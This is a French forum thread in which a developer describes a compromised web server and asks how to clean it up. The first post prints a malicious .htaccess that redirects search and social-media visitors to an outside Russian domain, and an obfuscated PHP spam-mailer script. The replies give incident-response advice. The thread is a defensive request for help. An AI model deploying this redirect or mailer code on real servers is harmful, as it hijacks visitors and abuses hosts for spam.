Serveur hacké - htaccess + php

**flo974** · 17/12/2011, 16h29

Bonjour,

Je suis confronté à un problème de taille.
Le serveur qui héberge une partie des sites a été hacké, je ne connais pas le degré de gravité. Pour tout dire, je suis développeur et mes connaissances en administration système sont rudimentaires, malheureusement je dois un peu me "démerder", la personne s'occupant du serveur est en vacances.

Donc je viens crier a l'aide !

Voici les symptômes :
Toutes les 2-3h, des fichiers htaccess sont créés ou modifiés avec une tartine de redirection vers des sites louches, dans presque tous les dossiers de sites, et sous dossiers.

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
<IfModule mod_rewrite.c>	
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing)\.(.*)				
RewriteRule ^(.*)$ http://aboutconvert.ru/kernel/index.php [R=301,L]	RewriteCond %{HTTP_REFERER} ^.*(dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|metabot|dmoz|euroseek|about|icq)\.(.*)		
RewriteRule ^(.*)$ http://aboutconvert.ru/kernel/index.php [R=301,L]	
</IfModule>
ErrorDocument 400 http://aboutconvert.ru/kernel/index.php			ErrorDocument 401 http://aboutconvert.ru/kernel/index.php			
ErrorDocument 403 http://aboutconvert.ru/kernel/index.php	
ErrorDocument 404 http://aboutconvert.ru/kernel/index.php
ErrorDocument 500 http://aboutconvert.ru/kernel/index.php

Il y a aussi des fichiers php générés avec des noms bizarre comme sm5cg0.php, last.php, old.php

Code php :

Sélectionner tout - Visualiser dans une fenêtre à part

error_reporting(0); if (!isset($_POST['l']) || !isset($_POST['d'])) die(PHP_OS . "10+" . md5(0987654321)); $v01b6e203 = stripslashes($_POST['l']); $v8d777f38 = stripslashes($_POST['d']); preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1); $vee11cbb1 = $vee11cbb1[1]; preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c); $vb068931c = $vb068931c[1]; preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9); $vc34487c9 = $vc34487c9[1]; preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42); $v6f4b5f42 = $v6f4b5f42[1]; preg_match('|<IMG>(.*)</IMG>|imsU', $v6f4b5f42, $v3ba24a80); $v3ba24a80 = $v3ba24a80[1]; $v0897acf4 = $_SERVER['SERVER_NAME']; if (ne667da76($v0897acf4)) { $v10497e3f = false; } else { if ($vb068931c != '') $vd98a07f8 = "$vb068931c "; $v0c83f57c = $vee11cbb1 . "@" . preg_replace('/^www\./i', '', $v0897acf4); $vd98a07f8 .= "<$v0c83f57c>"; $v4340fd73 = "From: $vd98a07f8\r\n"; $v10497e3f = true; } if (((strtolower(@ini_get('safe_mode')) == 'on') || (strtolower(@ini_get('safe_mode')) == 'yes') || (strtolower(@ini_get('safe_mode')) == 'true') || (ini_get("safe_mode") == 1 ))) { $v10497e3f = false; } $vf2b57013 = "==" . substr(sha1(date('r', time())), 16) . "=="; $v6e6eea18 = "==" . substr(sha1(date('r', time()+10)), 16) . "=="; $v435ed7e9 = "DCS00" . rand (0,9) . rand (0,9) . rand (0,9) .rand (0,9) .".jpg"; if ($v3ba24a80) { $v4b7cc569 = substr(sha1(date('r', time()+11)), 1, 8); $va11fa8df = ini_get('session.save_path'); $v2346ae27 = md5($v3ba24a80); if (file_exists("$va11fa8df/sess_$v2346ae27")) { $v5f163541 = chunk_split(base64_encode(file_get_contents("$va11fa8df/sess_$v2346ae27"))); } else { $v72611e52 = file_get_contents($v3ba24a80); $v5f163541 = chunk_split(base64_encode($v72611e52)); $v65ee5956 = fopen("$va11fa8df/sess_$v2346ae27", "w+"); fwrite($v65ee5956, $v72611e52); fclose($v65ee5956); } $v6f4b5f42 = preg_replace('|<IMG>.*</IMG>|imsU', "<img src=\"cid:$v4b7cc569@$v0897acf4\">", $v6f4b5f42); } $v6f4b5f42 = chunk_split(base64_encode($v6f4b5f42)); $v4340fd73 .= "MIME-Version: 1.0\r\n"; $v4340fd73 .= "Content-Type: multipart/mixed; boundary=\"$vf2b57013\"\r\n"; $v841a2d68 = "--"."$vf2b57013\nContent-Type: multipart/related; boundary=\"$v6e6eea18\";\n type=\"text/html\"\n\n--"."$v6e6eea18\nContent-Type: text/html; charset=\"iso-8859-1\"\nContent-Transfer-Encoding: base64\n\n$v6f4b5f42"; if ($v3ba24a80) { $v841a2d68 .= "\n--"."$v6e6eea18\nContent-Type: image/jpeg; name=\"$v435ed7e9\"\nContent-Transfer-Encoding: base64\nContent-ID: <$v4b7cc569@$v0897acf4>\nContent-Disposition: inline; filename=\"$v435ed7e9\"\n\n$v5f163541"; } $v841a2d68 .="\n\n--"."$v6e6eea18"."--\n\n--"."$vf2b57013"."--\n"; if ($v10497e3f) { if (mail($v01b6e203, $vc34487c9, $v841a2d68, $v4340fd73, "-f$v0c83f57c")) echo "OK" . md5(1234567890); else die(PHP_OS . "20+" . md5(0987654321)); } else { if (mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v4340fd73)) echo "OK" . md5(1234567890); else die(PHP_OS . "20+" . md5(0987654321)); } exit; function ne667da76($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); }

Des fichiers html avec des iframes qui ouvre des pages de sites louches...

Je ne sais pas quoi, j'ai beau les virer ça revient toujours.
Je n'arrive pas à trouver la faille.
J'ia mis des htaccess en root sensés protéger les .ht, et interdire les scripts dans les dossiers d'images,css.... mais ils sont réécrits et changé de groupe !

Connaissez vous des pistes, ou des actions à mener pour combattre ce genre d'infection ?

Merci

Invité · 17/12/2011, 20h17

La faille peut très bien être exploitée au niveau du portail même.

Il faut identifier le ou les portails qui peuvent disposer d'une faille de sécurité éventuelle et il faut analyser les logs du serveur s'ils n'ont pas été effacés par le pirate.

Tu as également des framework tel que samurai qui te permettent de tester les vulnérabilités les plus communes au niveau de ton portail.

http://samurai.inguardians.com/

**flo974** · 18/12/2011, 11h28

Merci pour les infos.

En remontant dans les logs, j'ai localisé le premier déclenchement d'un script php, un filesman... maintenant j'en trouvé à plusieurs endroits

D'après ce que j'ai lu, il faut que je change tous les codes ftp, code root, supprimer l'ensemble des fichiers infectés, trouver les failles et renforcer la sécurité au niveau de php, apache, et des dossiers... beaucoup de travail en perspective. J'espère que cela réglera le problème.

Si vous avez d'autres conseils, je suis preneur.

Merci

**Katyucha** · 19/12/2011, 16h21

Je ne connais pas ton hébergeur mais la première chose à faire après avoir changer TOUT les mdp, c'est de voir si tu peux isoler le serveur et que seul ton ip puisse y acceder, ca te permet de travailler tranquillement

**messinese** · 23/12/2011, 08h24

Bonjour,

Le soucis ne viens peut être même pas de ton site mais d'un autre hébergé sur le même serveur!

Après changer tes pass ne servira a rien si tu ne sais pas d’où et comment s'y est pris l'assaillant puisqu'il est évident que le serveur s'est fait rooté ..

Bon courage..

**metalamania** · 03/04/2012, 14h25

Bonjour,

Messinese a tout à fait raison !

Est-ce que vous utilisez votre propre serveur ?
Quels services sont dessus ? Depuis quand vous êtes vous rendu compte qu'il y avait un problème ?

Serveur hacké - htaccess + php

Sécurité

Vue hybride

Discussions similaires

Partager

Partager